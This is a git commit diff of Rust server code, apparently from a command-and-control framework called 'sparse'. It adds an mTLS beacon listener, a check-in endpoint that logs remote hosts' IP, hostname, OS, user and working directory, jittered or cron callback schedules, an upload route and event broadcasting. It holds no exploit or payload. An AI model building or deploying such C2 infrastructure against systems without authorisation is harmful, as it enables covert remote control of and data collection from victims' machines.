feat: event management and websocket for updates

This commit is contained in:
Andrew Rioux
2025-02-22 16:04:15 -05:00
parent 005048f1ce
commit faaa4d2d1a
48 changed files with 1409 additions and 204 deletions

View File

@@ -1,3 +1,8 @@
use axum::{
http::StatusCode,
response::{IntoResponse, Response},
};
#[derive(Debug)]
pub enum Error {
Generic(String),
@@ -51,6 +56,12 @@ impl std::error::Error for Error {
}
}
impl IntoResponse for Error {
fn into_response(self) -> Response {
(StatusCode::INTERNAL_SERVER_ERROR, format!("{self}")).into_response()
}
}
impl std::str::FromStr for Error {
type Err = Self;

View File

@@ -1,18 +1,25 @@
use std::{
collections::HashMap,
sync::{Arc, RwLock},
collections::HashMap, net::SocketAddr, sync::{Arc, RwLock}
};
use axum::routing::{Router, get, post};
use rcgen::{Certificate, CertificateParams, KeyPair};
use rcgen::{CertificateParams, KeyPair};
use rustls::{RootCertStore, server::WebPkiClientVerifier};
use sqlx::SqlitePool;
use tokio::task::JoinHandle;
use tokio::{sync::broadcast, task::JoinHandle};
pub mod error;
mod router;
#[derive(Clone)]
pub enum BeaconEvent {
NewBeacon(String),
Checkin(String)
}
pub struct BeaconListenerHandle {
join_handle: JoinHandle<()>,
events_broadcast: broadcast::Sender<BeaconEvent>,
}
impl BeaconListenerHandle {
@@ -23,6 +30,10 @@ impl BeaconListenerHandle {
pub fn abort(&self) {
self.join_handle.abort()
}
pub fn event_subscribe(&self) -> broadcast::Receiver<BeaconEvent> {
self.events_broadcast.subscribe()
}
}
#[derive(Clone, Default)]
@@ -39,6 +50,7 @@ impl std::ops::Deref for BeaconListenerMap {
pub async fn start_all_listeners(
beacon_listener_map: BeaconListenerMap,
db: SqlitePool,
beacon_event_broadcast: tokio::sync::broadcast::Sender::<BeaconEvent>
) -> Result<(), crate::error::Error> {
rustls::crypto::ring::default_provider().install_default().expect("could not set up rustls");
@@ -53,6 +65,7 @@ pub async fn start_all_listeners(
beacon_listener_map.clone(),
listener.listener_id,
db.clone(),
beacon_event_broadcast.clone(),
)
.await?;
}
@@ -60,15 +73,8 @@ pub async fn start_all_listeners(
Ok(())
}
#[derive(Clone)]
struct ListenerState {
db: SqlitePool,
}
struct Listener {
listener_id: i64,
port: i64,
public_ip: String,
domain_name: String,
certificate: Vec<u8>,
privkey: Vec<u8>,
@@ -78,6 +84,7 @@ pub async fn start_listener(
beacon_listener_map: BeaconListenerMap,
listener_id: i64,
db: SqlitePool,
beacon_event_broadcast: tokio::sync::broadcast::Sender::<BeaconEvent>
) -> Result<(), crate::error::Error> {
{
let Ok(blm_handle) = beacon_listener_map.read() else {
@@ -94,29 +101,15 @@ pub async fn start_listener(
}
let listener = sqlx::query_as!(
Listener,
"SELECT * FROM beacon_listener WHERE listener_id = ?",
"SELECT port, domain_name, certificate, privkey FROM beacon_listener WHERE listener_id = ?",
listener_id
)
.fetch_one(&db)
.await?;
let app: Router<()> = Router::new()
.route(
"/register_beacon",
post(|| async {
tracing::info!("Beacon attempting to register");
}),
)
.route(
"/test",
get(|| async {
tracing::info!("Hello");
"hi there"
}),
)
.with_state(ListenerState { db });
let sender = broadcast::Sender::new(128);
let hidden_app = Router::new().nest("/hidden_sparse", app);
let app = router::get_router(db, sender.clone());
let ca_cert = rustls::pki_types::CertificateDer::from(listener.certificate.clone());
@@ -175,7 +168,7 @@ pub async fn start_listener(
addr,
axum_server::tls_rustls::RustlsConfig::from_config(Arc::new(tls_config)),
)
.serve(hidden_app.into_make_service())
.serve(app.into_make_service_with_connect_info::<SocketAddr>())
.await;
if let Err(e) = res {
@@ -189,7 +182,7 @@ pub async fn start_listener(
));
};
blm_handle.insert(listener_id, BeaconListenerHandle { join_handle });
blm_handle.insert(listener_id, BeaconListenerHandle { join_handle, events_broadcast: sender });
Ok(())
}

View File

@@ -0,0 +1,149 @@
use std::net::SocketAddr;
use axum::{extract::{State, ConnectInfo}, routing::post, Router};
use axum_msgpack::MsgPack;
use sqlx::SqlitePool;
use tokio::sync::broadcast;
use sparse_actions::messages;
use crate::{BeaconEvent, error};
#[derive(Clone)]
pub struct ListenerState {
db: SqlitePool,
event_publisher: broadcast::Sender<BeaconEvent>,
}
#[axum::debug_handler]
pub async fn handle_checkin(
State(state): State<ListenerState>,
ConnectInfo(addr): ConnectInfo<SocketAddr>,
MsgPack(reg): MsgPack<messages::RegisterBeacon>,
) -> Result<MsgPack<messages::BeaconConfig>, error::Error> {
struct DbBeaconConfig {
mode: Option<String>,
regular_interval: Option<i64>,
random_min_time: Option<i64>,
random_max_time: Option<i64>,
cron_schedule: Option<String>,
cron_mode: Option<String>,
}
use messages::{CronTimezone, RuntimeConfig as RC};
fn parse_db_config(rec: DbBeaconConfig) -> Option<RC> {
Some(match &*rec.mode? {
"single" => RC::Oneshot,
"regular" => RC::Regular { interval: rec.regular_interval? as u64 },
"random" => RC::Random {
interval_min: rec.random_min_time? as u64,
interval_max: rec.random_max_time? as u64
},
"cron" => RC::Cron {
schedule: rec.cron_schedule?,
timezone: match &*rec.cron_mode? {
"utc" => CronTimezone::Utc,
"local" => CronTimezone::Local,
_ => None?
}
} ,
_ => None?
})
}
tracing::info!("Beacon {} connecting from {addr}", &reg.beacon_id);
let current_beacon_reg = sqlx::query_as!(
DbBeaconConfig,
r"SELECT c.mode as mode, c.regular_interval as regular_interval, c.random_min_time as random_min_time,
c.random_max_time as random_max_time, c.cron_schedule as cron_schedule, c.cron_mode as cron_mode
FROM beacon_instance i
INNER JOIN beacon_config c ON c.config_id = i.config_id
WHERE i.beacon_id = ?
UNION
SELECT c.mode as mode, c.regular_interval as regular_interval, c.random_min_time as random_min_time,
c.random_max_time as random_max_time, c.cron_schedule as cron_schedule, c.cron_mode as cron_mode
FROM beacon_instance i
INNER JOIN beacon_template t ON i.template_id = t.template_id
INNER JOIN beacon_config c ON t.config_id = c.config_id
WHERE i.beacon_id = ?"r,
reg.beacon_id,
reg.beacon_id
)
.fetch_optional(&state.db)
.await?;
let current_beacon_reg = match current_beacon_reg {
Some(rec) => {
parse_db_config(rec)
},
None => {
let ip = format!("{}", addr.ip());
let cwd = reg
.cwd
.to_str()
.unwrap_or("(unknown)");
sqlx::query!(
r#"INSERT INTO beacon_instance
(beacon_id, template_id, peer_ip, nickname, cwd, operating_system, beacon_userent, hostname)
VALUES
(?, ?, ?, "", ?, ?, ?, ?)"#r,
reg.beacon_id,
reg.template_id,
ip,
cwd,
reg.operating_system,
reg.userent,
reg.hostname
)
.execute(&state.db)
.await?;
let rec = sqlx::query_as!(
DbBeaconConfig,
r"SELECT c.mode, c.regular_interval, c.random_min_time, c.random_max_time, c.cron_schedule, c.cron_mode
FROM beacon_template t
INNER JOIN beacon_config c ON c.config_id = t.config_id
WHERE t.template_id = ?",
reg.template_id
)
.fetch_one(&state.db)
.await?;
parse_db_config(rec)
}
};
let now = chrono::Utc::now();
sqlx::query!(
r"INSERT INTO beacon_checkin (beacon_id, checkin_date) VALUES (?, ?)"r,
reg.beacon_id,
now
)
.execute(&state.db)
.await?;
let current_beacon_reg = current_beacon_reg
.ok_or(error::Error::Generic("could not load configuration".to_string()))?;
Ok(MsgPack(messages::BeaconConfig {
runtime_config: current_beacon_reg
}))
}
pub fn get_router(db: SqlitePool, event_publisher: broadcast::Sender<BeaconEvent>) -> Router<()> {
Router::new()
.route(
"/checkin",
post(handle_checkin),
)
.route(
"/upload/:beaconid/:commandid",
post(|| async {
tracing::info!("Hello");
"hi there"
}),
)
.with_state(ListenerState { db, event_publisher })
}